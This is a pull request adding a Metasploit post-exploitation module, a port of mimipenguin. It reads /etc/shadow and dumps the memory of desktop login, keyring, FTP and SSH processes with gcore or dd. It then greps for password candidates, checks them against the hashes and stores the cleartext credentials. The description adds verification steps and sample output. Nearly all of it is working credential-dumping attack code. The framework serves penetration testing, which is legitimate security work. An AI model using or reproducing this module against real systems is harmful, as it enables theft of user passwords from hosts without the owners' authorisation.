### PR TITLE
Add mimipenguin

### DIFF
--- a/modules/post/linux/gather/mimipenguin.rb
+++ b/modules/post/linux/gather/mimipenguin.rb
@@ -1,0 +1,268 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Auxiliary::Report
+
+  PROCESSES = [{
+    app:     'Gnome Password',
+    cmdline: ['gdm-password'],
+    needles: ['^_pammodutil_getpwnam_root_1$', '^gkr_system_authtok$']
+  }, {
+    app:     'Gnome Keyring',
+    cmdline: ['gnome-keyring-daemon'],
+    needles: ['^.+libgck\-1\.so\.0$', 'libgcrypt\.so\..+$', 'linux-vdso\.so\.1$']
+  }, {
+    app:     'LightDM',
+    cmdline: ['lightdm'],
+    needles: ['^_pammodutil_getspnam_']
+  }, {
+    app:     'VSFTP',
+    cmdline: ['vsftpd'],
+    needles: ['^::.+\:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$']
+  }, {
+    app:     'SSH',
+    cmdline: ['sshd:'],
+    needles: ['^sudo.+']
+  }].freeze
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Mimipenguin',
+      'Description'   => 'This module searches process memory for system user credentials.',
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'huntergregal',    # mimipenguin.sh
+          'the-useless-one', # mimipenguin.py
+          'bcoles'           # Metasploit
+        ],
+      'Platform'      => ['linux'],
+      'SessionTypes'  => ['shell', 'meterpreter'],
+      'References'    => [['URL', 'https://github.com/huntergregal/mimipenguin']]))
+    register_options [
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir']
+  end
+
+  #
+  # Get password hashes for all users
+  #
+  def get_hashes
+    hashes = []
+
+    shadow = read_file '/etc/shadow' || ''
+    shadow.each_line do |line|
+      user, hash = line.split(':')[0..1]
+      next if hash.eql? '*'
+      next if hash.start_with? '!'
+      hashes << { user: user, hash: hash }
+    end
+
+    hashes
+  end
+
+  #
+  # Get pid and cmdline for all running processes
+  #
+  def get_processes
+    processes = []
+
+    cmd_exec('ls /proc').each_line.map { |pid| pid.to_s.chomp }.each do |pid|
+      next unless pid =~ /\A\d+\z/
+      cmdline = read_file "/proc/#{pid}/cmdline" || ''
+      processes << { pid: pid, cmdline: cmdline.to_s }
+    end
+
+    processes
+  end
+
+  #
+  # Dump process memory
+  #
+  def dump_mem(pid, dumpfile)
+    case @technique.to_s
+    when 'gcore'
+      dump_mem_gcore pid, dumpfile
+    when 'dd'
+      dump_mem_dd pid, dumpfile
+    end
+  end
+
+  #
+  # Dump process memory with gcore
+  #
+  def dump_mem_gcore(pid, dumpfile)
+    res = cmd_exec "gcore -o '#{dumpfile}' #{pid}", nil, 60
+    res.include? 'Saved corefile'
+  rescue
+    false
+  end
+
+  #
+  # Dump process memory with dd
+  #
+  def dump_mem_dd(pid, dumpfile)
+    mem_maps = cmd_exec "grep -E '^[0-9a-f-]* r' /proc/#{pid}/maps | cut -d' ' -f 1"
+    mem_maps.each_line do |line|
+      memrange_start = line.chomp.split('-')[0].to_i(16)
+      memrange_stop = line.chomp.split('-')[1].to_i(16)
+      memrange_size = memrange_stop - memrange_start
+
+      next if memrange_size <= 0
+
+      # vprint_status "Dumping memory (bytes #{memrange_start} - #{memrange_stop}) from process #{pid} (#{memrange_size} bytes)"
+      cmd = "dd if=/proc/#{pid}/mem of=\"#{dumpfile}.#{pid}\""
+      cmd += " ibs=1 oflag=append conv=notrunc skip=\"#{memrange_start}\" count=\"#{memrange_size}\""
+      cmd += " > /dev/null 2>&1"
+      cmd_exec cmd
+    end
+    true
+  rescue
+    false
+  end
+
+  #
+  # Check credentials
+  #
+  # Returns an array of users for which the specified password is valid
+  #
+  def check_valid_password(password)
+    users = []
+
+    @hashes.each do |h|
+      hash = h[:hash]
+      type = hash.split('$')[1]
+      salt = hash.split('$')[2]
+      if password.crypt("$#{type}$#{salt}").to_s.eql? hash
+        users << h[:user]
+      end
+    end
+
+    users
+  end
+
+  #
+  # Find processes matching +process_names+
+  # find process ID (pid) for each process,
+  # dump pid memory to dumpfile on filesystem,
+  # search the dumpfile for +match_strings+,
+  # and return needle and surrounding strings.
+  #
+  def search_mem(process_names, match_strings)
+    potential_passwords = []
+
+    dumpfile = "#{base_dir}/.#{Rex::Text.rand_text_alphanumeric(10..15)}"
+    process_names.each do |process_name|
+      @processes.select { |p| p[:cmdline].match(process_name) }.each do |process|
+        pid = process[:pid]
+        vprint_status "Found PID matching #{process_name}: #{process[:pid]}"
+
+        unless dump_mem(pid, dumpfile)
+          print_error "Error creating dump file for #{process_name} (#{pid})"
+          next
+        end
+
+        match_strings.each do |needle|
+          grep_mem = cmd_exec("strings '#{dumpfile}.#{pid}' | grep -E -a -B10 -A10 '#{needle}'").to_s
+          grep_mem.each_line do |line|
+            potential_passwords << line.chomp
+          end
+        end
+
+        rm_f "#{dumpfile}.#{pid}"
+      end
+    end
+
+    potential_passwords
+  end
+
+  def run
+    unless is_root?
+      fail_with Failure::BadConfig, 'Root privileges are required'
+    end
+
+    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    %w[strings grep].each do |cmd|
+      unless command_exists? cmd
+        fail_with Failure::NotVulnerable, "#{cmd} is required but not installed"
+      end
+    end
+
+    @technique = nil
+    tools = %w[gcore dd]
+    tools.each do |cmd|
+      if command_exists? cmd
+        @technique = cmd
+        break
+      end
+    end
+    if @technique.nil?
+      fail_with Failure::NotVulnerable, "No tools to dump memory are available (#{tools.join(' / ')})"
+    end
+
+    vprint_status 'Retrieving password hashes...'
+    @hashes = get_hashes
+    if @hashes.empty?
+      fail_with Failure::Unknown, 'Found no password hashes'
+    end
+    vprint_status "Found password hashes for #{@hashes.size} users"
+
+    vprint_status 'Retrieving process list...'
+    @processes = get_processes
+    if @processes.empty?
+      fail_with Failure::Unknown, 'Found no running processes'
+    end
+    vprint_status "Found #{@processes.size} running processes"
+
+    creds = []
+    PROCESSES.each do |p|
+      app = p[:app]
+      search_mem(p[:cmdline], p[:needles]).each do |password|
+        check_valid_password(password).each do |user|
+          vprint_good "[#{app}] Found credentials: #{user}:#{password}"
+          creds << [app, user, password]
+          store_valid_credential user: user, private: password, proof: app
+        end
+      end
+    end
+
+    if creds.empty?
+      print_status 'Found no credentials'
+      return
+    end
+
+    vprint_good "Found #{creds.size} credentials"
+    table = Rex::Text::Table.new(
+      'Header'    => 'Credentials',
+      'Indent'    => 2,
+      'SortIndex' => 0,
+      'Columns'   => ['Application', 'Username', 'Password']
+    )
+    creds.each { |c| table << c }
+    print_line
+    print_line table.to_s
+
+    p = store_loot(
+      'mimipenguin.csv',
+      'text/plain',
+      session,
+      table.to_csv,
+      nil
+    )
+
+    print_status "Credentials stored in #{p}"
+  end
+end

--- a/modules/post/linux/gather/mimipenguin.rb
+++ b/modules/post/linux/gather/mimipenguin.rb
@@ -197,7 +197,7 @@ class MetasploitModule < Msf::Post
     elsif command_exists? 'dd'
       @dump_technique = 'dd'
     else
-      fail_with Failure::NotVulnerable, "No tools to dump memory are available (#{tools.join(' / ')})"
+      fail_with Failure::NotVulnerable, "No tools to dump memory are available (gcore / dd)"
     end
 
     vprint_status 'Retrieving password hashes...'


### PR DESCRIPTION
Add `post/linux/gather/mimipenguin`

    This module searches process memory for system user credentials.

**work in progress / request for comments / request for testing**

This is a port of [mimipenguin](https://github.com/huntergregal/mimipenguin) to Metasploit.


### Requirements

* `root` privileges
* `strings` executable in `$PATH`
* `grep`executable (with support for `-E`)  in `$PATH`
* `gcore` or `dd` executable in `$PATH`


### Design

I've attempted to make the module efficient-ish by performing the majority of processing on the remote host. However, the following information is returned to Metasploit and stored in local memory for processing:

* all usernames and associated password hash
* all strings +/- 10 lines from each `needle` within each process of interest

No doubt I've made some unsafe assumptions; in particular:

* ~~The formatting and subsequent parsing of `crypt` hashes.~~
* If `grep` does not support the `-E` flag, things will likely go badly.
* If the partition for the dumpfile runs out of disk space, things will likely go badly.


### Dumping Memory


The module supports two techniques to dump process memory: `gcore` and `dd`.

* `gcore` is reliable but may not be present on all systems. `gcore` is the default technique used, when available, as it is faster than `dd`.

* `dd` is likely to be present on most systems. It also allows more granular control over which sections of memory are queried. This may be advantageous to improve efficiency in future implementations, but for now all process memory is dumped.

I had, but removed, a third option for `gdb`. Should anything go wrong while dumping memory with `gdb`, the process is likely to die a fiery death, which is more entertaining than it is desirable.


### Caveats

Most of the original mimipenguin functionality has been ported. The original also supported pulling HTTP Basic authentication credentials from Apache memory. I have not added this functionality. I do not intend to do so.

This module uses the same needles as the original `mimipenguin.py`. As such, it will fail to identify passwords in instances where mimipenguin also fails to identify passwords. This can easily be resolved by adding new needles as they're added to mimipenguin. Given that this is a shortcoming of the original project, of which this module is a port, I don't intend to improve this situation in this PR.

I've tested retrieving credentials from LightDM and gnome services successfully. Other services, such as vsftpd and ssh/sudo have not been tested. In theory, the same needles are used as in the original mimipenguin, so these should "just work".


## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Get a session
- [ ] `use post/linux/gather/mimipenguin`
- [ ] `set SESSION <id>`
- [ ] `run`
- [ ] You should receive credentials


## Documentation

I'll add documentation when the module is refined and tested.


### Scenarios

```
msf5 post(linux/gather/mimipenguin) > rexploit 
[*] Reloading module...

[*] Dumping credentials...
[+] [Gnome Keyring] Found credentials: user:password
[+] [LightDM] Found credentials: user:password
[+] Found 2 credentials

Credentials
===========

  Application    Username  Password
  -----------    --------  --------
  Gnome Keyring  user      password
  LightDM        user      password

[*] Credentials stored in /root/.msf4/loot/20180707025923_default_172.16.191.211_mimipenguin.csv_789726.txt
[*] Post module execution completed
msf5 post(linux/gather/mimipenguin) > cat /root/.msf4/loot/20180707025923_default_172.16.191.211_mimipenguin.csv_789726.txt
[*] exec: cat /root/.msf4/loot/20180707025923_default_172.16.191.211_mimipenguin.csv_789726.txt

Application,Username,Password
"Gnome Keyring","user","password"
"LightDM","user","password"
```
